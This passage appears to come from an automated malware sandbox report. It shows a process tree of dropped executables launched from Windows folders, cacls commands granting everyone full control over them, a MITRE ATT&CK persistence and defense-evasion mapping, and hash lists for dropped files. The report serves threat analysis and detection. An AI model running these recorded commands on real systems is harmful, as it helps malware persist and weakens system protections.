C:\Windows\SysWOW64\hmdriy.exeC:\Windows\SysWOW64\hmdriy.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4076
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\euubyab.exe1⤵PID:552
-
C:\Windows\ime\euubyab.exeC:\Windows\ime\euubyab.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5104
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nziamibb\euubyab.exe /p everyone:F1⤵PID:2320
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:2280
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nziamibb\euubyab.exe /p everyone:F2⤵PID:756
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\kkutcgiyb\btglic.exe /p everyone:F1⤵PID:4780
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4652
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\kkutcgiyb\btglic.exe /p everyone:F2⤵PID:220
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\kkutcgiyb\btglic.exe /p everyone:F1⤵PID:3952
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:996
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\kkutcgiyb\btglic.exe /p everyone:F2⤵PID:376
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\nziamibb\euubyab.exe /p everyone:F1⤵PID:2772
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4944
-
-
C:\Windows\system32\cacls.execacls C:\Windows\nziamibb\euubyab.exe /p everyone:F2⤵PID:3796
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\euubyab.exe1⤵PID:4552
-
C:\Windows\ime\euubyab.exeC:\Windows\ime\euubyab.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1800
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
45.4MB
MD58e13d5ef8550b651912ca24e61eb9c05
SHA12394dc28d2b6ab9f545506f6b92945408025b23a
SHA2567e64ea90bf4b10b9c77956035bd28397d727ef086b2f9a89ecd9b2bfd157b99a
SHA5123c097e64fbb74ed51f94e98142ed73bfd5f5bfdc5d2ddb9ffb2c4475dee49c56c46f5e5cc61e1ee3b839db4a15713d079a3714cd697a0a689e6e3d3c72a2e34a
-
Filesize
26.0MB
MD5ac44503c3576d33bebf594170336dbab
SHA1cca908ceb36c3e1d75c45e8ab8643cbf247bc57c
SHA256e76ebae69e2e9e67562ba8d0b7d9248418473106826f7a86e5aec44d41e8e75d
SHA5129f229a8635599555b9fc697d2d7886705f151a01536597a3cd374e56262ecf26d96b2d03f132a1f9bd665c9a05b47cfd9d7bf60123c65c95758b1a300ce90a81
-
Filesize
4.1MB
MD54959d3e3be0a5f1c0c3c3579f75ecdf9
SHA1f5f31f2831e40537507180d7185b808c1804a18e
SHA25651bf6b5969bf75471a17aeff15ac4a1134b4469cb107d95bf15776b5b422c741
SHA51297a81831174766353b5639ea96abe5b5daa85e4dee4825c969f4fe9dc7bf50019c71209e9dd0a295be729dd5b6faa5ceeb2367b29f6c62ceff083cfff4078162
-
Filesize
7.5MB
MD5963a8df01ecc8200b03471f291a26696
SHA16e24239c631ae17e28e356ca10b64dcae3575254
SHA256e2e194e6669ef9b8df2f37b126ad4ac1dfe6cd7a07085a5c0879975b9b7bb80d
SHA512813983dd55aa075e83b918bb8d7920d034749973bff0ca4d2ce48aecf72e1afc970f1760f1bf3064ffe7bb741d8aad03c613ab35c5507fac28779a605b29d483
-
Filesize
3.8MB
MD5d65c71a34c5fc54b921ddb86fe27dda6
SHA10f21c42c88139b531851297a750557ed489ddb4c
SHA256b03ff9620fefa6815e3202a4df363218f91514db0fbc5d49b26728975a38ac08
SHA5127b652ba880d55cf6c0c0290b7180ecb0aad62ccafa5a798fc3e4c2f2b5c06f68f242035fe13c5e7aa610780d2444b49499d982addaca473a07b25ca3a6e8c9df
-
Filesize
2.9MB
MD583615d9e7a3ef6948143f134321af427
SHA1fcb5da71a2cc2b5e83da1eb7979d8b7cc584318e
SHA256d306cf6bdfa8e0b5a7ef274159e5393c071d9b0c788631e2fd7fb29488410d6a
SHA512a27e2d9581bf3644233b847f5fb87c5567265c7b44e7e8f907f591de883313776191a05229d848640df31d49b84ccc6c22676f1fbfb061de9915a805fde863d2
-
Filesize
818KB
MD598f570553168459c1206954ec3541c01
SHA16562ad5f06ff4b9afc1e6cd0954a6f04beb126c5
SHA25642a32ed5a7397371d70bc161374e209fd479f978921b45a685fc06cc0c39c2ef
SHA512f1c1ecabbbc01b5913cf7bbd930472a039d327c1dec740a75208887a0554dcfcd0f071ed36287b1af451a673d69a1b2c0b21bd5ca969a278ba4c3dd51bb444b9
-
Filesize
8.6MB
MD58a8b1b597bbfec0e589511a412778fa3
SHA1b63d9a6d9cfdaebade0815666f8d011e4154b866
SHA2563f9cf762f4a87d3ed9977a4dffe44b01e28bc5d3d1a5a62e3f808896bdb0918f
SHA512fa12649fdc8c4f9be94fef9618430746f034287147ad6f39d788c18c64faa7faf0f1fe034a75b50a9e29d4ad7ae9b7ad8d07d5017cb6d2b1a65e8917a5e0d6e0
-
Filesize
2.4MB
MD5bcf901da454ab76382f51d0024f73496
SHA193ba047584e7d9d7b1f821537a7cd7c12d51e841
SHA25612b2bda82efdeb9d3774d70e18744999f1292d839e4e5ead8d98683691911ad0
SHA51215c5a0a1c9a8927dd2f01c8bc3b69c033f6262a25b054a162933e00319bb5c117ba9b9a4066801f6706a519180ead10f433a3bd5fb91c9542e053236c69a1e8a
-
Filesize
21.1MB
MD57ec984ed9bf88b3bce13f8fa6029270a
SHA1ea96ab4302c65f0b182f45b273689c66e37bb9ac
SHA256f9466c93fded4d8e63dd0d832cdf95e57e1fd3b4e62a6dab6917eccfc8199c6a
SHA512a5d63769b8e1a8b6abfe416e53e3c06b828eab7814f883eca2f85c24dd9ec4af4171cc68bb6372fe41320ea74acb29de372e1570e478b41ec04e3e423b8cd9bd
-
Filesize
8.5MB
MD5b089e566a19d772341bfa0257f6451db
SHA17567553cb1d298dbfc4f12baf3d3010638184ef5
SHA256f43b833764b8c616d1d6319accff7587bdc4dfe62f91441cf92a3c0647f21611
SHA51280ca9983534f8235b984379281b06431bc2312cb4578030d158db247a46aa90be3e2ed6b2fe29f241a2e678d5499a81000cd322d072351ca91635c6408fff3c8
-
Filesize
1.3MB
MD5da2a751ee8b4dd37ceadb01d04244d6f
SHA1d98c5459940715a4720129e0078585953f87bfdf
SHA256c5bbfe3c3f90e89cc06b31f3252e042be6f5dcf7caa75206a0dbba5c1fd474c0
SHA51203e2e5de3b251e787527f5cf0d0077e9069e6c9871318bc235f24e9927e4f57eec4abbe21698bef83b3151a0f112c9e667e7b82f91eb11a9e998fe688f820ea5
-
Filesize
33.4MB
MD50bd303d19527839fd1a31a3879cfa22a
SHA18ecd97f6e730556a147ae5f94aa7df898b484c72
SHA256d4322eca7c379fe21af8327a3f08c66dd6a7271f1689ceeabb2ea6526a93ea0c
SHA51271fc5eb751c6d16fd31116d7da06119bfa3047301ee3a78bb065225723b5bf452f25908c78387e5b25d4a1c972ff76459b9ec9ed2c76b32b807d76b71cc1e8a1
-
Filesize
1.9MB
MD5b49388f5cd21ba6158caa6ef51002d06
SHA1cbac8c23308316697ae08775b1073a32d0c78549
SHA256676f51f7758d4b5bd73a857c24de83bb9926f1b49df80ff70b1ad6782e024be0
SHA5121156fb9c181e086e61b209fa5584a6e64a3b5d58fffd2617585154c64de194b4947d8e1d338a8e5a725ee72573c5eace3ea4b1a4bf8d86b4c618be69cd13f690
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
7.6MB
MD541de885f705bd2fe499cec57cc4b85d4
SHA1167c344e054d55f88b00df21aaca84b4b130bc99
SHA256afa1d6d00d563c75ce11beeb38d96f16fe6c4d9e0cc46e27e7add22fd18a6e9f
SHA51242c66c727579361f9bd06f3e320add130f2df10e589d137863b78148c4767d6703de2960d4bc5f20e44b92f5d373709da6a91b343e06d9e925de026e1edc1abe
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376